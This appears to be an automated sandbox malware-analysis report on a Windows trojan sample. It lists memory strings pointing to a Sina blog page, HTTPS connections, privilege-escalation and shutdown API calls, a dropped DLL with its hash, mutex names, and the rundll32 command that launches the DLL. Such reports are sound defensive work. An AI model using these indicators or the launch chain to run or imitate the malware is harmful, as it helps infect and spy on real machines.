Source: rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543180227.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/s
Source: rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/t8B
Source: rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709101946.0000000005E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/tdesk
Source: rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/ti
Source: rundll32.exe, 0000000B.00000003.1898619858.000000000313D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1879231380.000000000312E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938773718.0000000003136000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.000000000312E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 0000000B.00000003.2997109068.0000000005F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807)
Source: rundll32.exe, 0000000B.00000003.1873442088.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2305140592.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3647858321.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807.
Source: rundll32.exe, 0000000B.00000003.3732644800.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807.br
Source: rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807/.
Source: rundll32.exe, 0000000B.00000003.2958626885.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/56550298071Sh88F86E74-75B2-4AFD-B463-A2998EB0EEF6
Source: rundll32.exe, 0000000B.00000003.2598017864.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/56550298073
Source: rundll32.exe, 0000000B.00000003.3498970551.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/56550298073AL6_
Source: rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/56550298075
Source: rundll32.exe, 0000000B.00000003.1930989630.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/56550298076
Source: rundll32.exe, 0000000B.00000003.1955205499.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1872794400.0000000005E75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804453169.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230859996.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3614190746.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2440193013.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3291918359.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3586874031.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1628908153.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3298966343.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2059813968.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543180227.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709101946.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032265357.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/56550298079
Source: rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807D
Source: rundll32.exe, 0000000B.00000003.3607533848.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807HSystemIndex.1.gthrRA_
Source: rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807S.
Source: rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807Y
Source: rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807Y6
Source: rundll32.exe, 0000000B.00000003.2484714513.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185332580.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2407360360.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417680832.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2162385617.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2412160866.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807c
Source: rundll32.exe, 0000000B.00000003.2938513418.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2305140592.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807h
Source: rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807lication
Source: rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807q
Source: rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3291918359.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3586874031.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3298966343.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658959024.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524304026.0000000005E57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807q6~
Source: rundll32.exe, 0000000B.00000003.1955205499.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1872794400.0000000005E75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804453169.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230859996.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3614190746.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2440193013.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3291918359.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3586874031.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3298966343.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2059813968.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543180227.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032265357.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807w
Source: rundll32.exe, 0000000B.00000003.3090392700.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3090270988.0000000005F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u/5655029807ytile.png#
Source: rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3310227243.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3517778921.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2444614613.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2484714513.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229640488.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266699679.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938513418.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023193696.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230750709.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185332580.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2407360360.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2231428453.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2629218588.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3742655429.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.sina.com.cn/u2

Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65033
Source: unknown	Network traffic detected: HTTP traffic on port 63386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56556
Source: unknown	Network traffic detected: HTTP traffic on port 54093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63764
Source: unknown	Network traffic detected: HTTP traffic on port 56091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50502
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 54642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50503
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50869
Source: unknown	Network traffic detected: HTTP traffic on port 52679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55599
Source: unknown	Network traffic detected: HTTP traffic on port 65292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 50703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50590
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown	Network traffic detected: HTTP traffic on port 50502 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65292
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65482 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 65033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 50869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50640
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56226
Source: unknown	Network traffic detected: HTTP traffic on port 51645 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50640 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52679
Source: unknown	Network traffic detected: HTTP traffic on port 56742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51462
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51194
Source: unknown	Network traffic detected: HTTP traffic on port 56556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65482
Source: unknown	Network traffic detected: HTTP traffic on port 63100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50420
Source: unknown	Network traffic detected: HTTP traffic on port 51915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53382
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56091
Source: unknown	Network traffic detected: HTTP traffic on port 51415 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51645
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56937
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53648 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59372
Source: unknown	Network traffic detected: HTTP traffic on port 60232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 50503 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51415
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54642
Source: unknown	Network traffic detected: HTTP traffic on port 55599 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54093
Source: unknown	Network traffic detected: HTTP traffic on port 58088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50590 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59261
Source: unknown	Network traffic detected: HTTP traffic on port 50369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63755

Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:49958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:51645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:54642 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:65033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:52867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:59261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:63764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:52804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:60232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:63386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50640 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:53648 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:63100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50503 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:53382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:55599 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:59372 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:65482 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:52679 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:58163 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_1000C160: wsprintfA,DeviceIoControl,

11_2_1000C160

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_100049F0 ExitWindowsEx,

11_2_100049F0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10005A10	11_2_10005A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1000EB80	11_2_1000EB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1000DB90	11_2_1000DB90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10010400	11_2_10010400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1000F500	11_2_1000F500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10009640	11_2_10009640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1000EF70	11_2_1000EF70

Source: Joe Sandbox View

Dropped File: C:\ijbbn\gduol.dll C7C41689DE030DF0F78F471422FA2A6383B36E77C94E7F6F124A96FEB3E27ED7

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10011A56 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10001000 appears 293 times

Source: peks66Iy06.exe	Binary or memory string: OriginalFilename vs peks66Iy06.exe
Source: peks66Iy06.exe, 00000004.00000000.1277010879.0000000000401000.00000080.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameWinWord.exeL vs peks66Iy06.exe
Source: peks66Iy06.exe, 00000004.00000003.1280139543.00000000022BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinWord.exeL vs peks66Iy06.exe
Source: peks66Iy06.exe, 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameWinWord.exeL vs peks66Iy06.exe
Source: peks66Iy06.exe	Binary or memory string: OriginalFilenameWinWord.exeL vs peks66Iy06.exe

Source: peks66Iy06.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/3@54/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_1000C230 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,

11_2_1000C230

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10004F60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	11_2_10004F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10006090 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,	11_2_10006090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10004B90 AdjustTokenPrivileges,	11_2_10004B90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_10004AA0 CreateToolhelp32Snapshot,

11_2_10004AA0

Source: C:\Users\user\Desktop\peks66Iy06.exe

Code function: 4_2_004013D0 FindResourceA,LoadResource,SizeofResource,LockResource,wsprintfA,wsprintfA,CreateDirectoryA,Sleep,wsprintfA,CreateFileA,WriteFile,CloseHandle,GetModuleFileNameA,wsprintfA,CreateProcessA,

4_2_004013D0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\krnaver.com:6520
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Mkrnaver.com:6520

Source: C:\Users\user\Desktop\peks66Iy06.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\nfxboms.exe

Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ijbbn\gduol.dll",init c:\nfxboms.exe

Source: peks66Iy06.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\peks66Iy06.exe

File read: C:\Users\user\Desktop\peks66Iy06.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\peks66Iy06.exe "C:\Users\user\Desktop\peks66Iy06.exe"
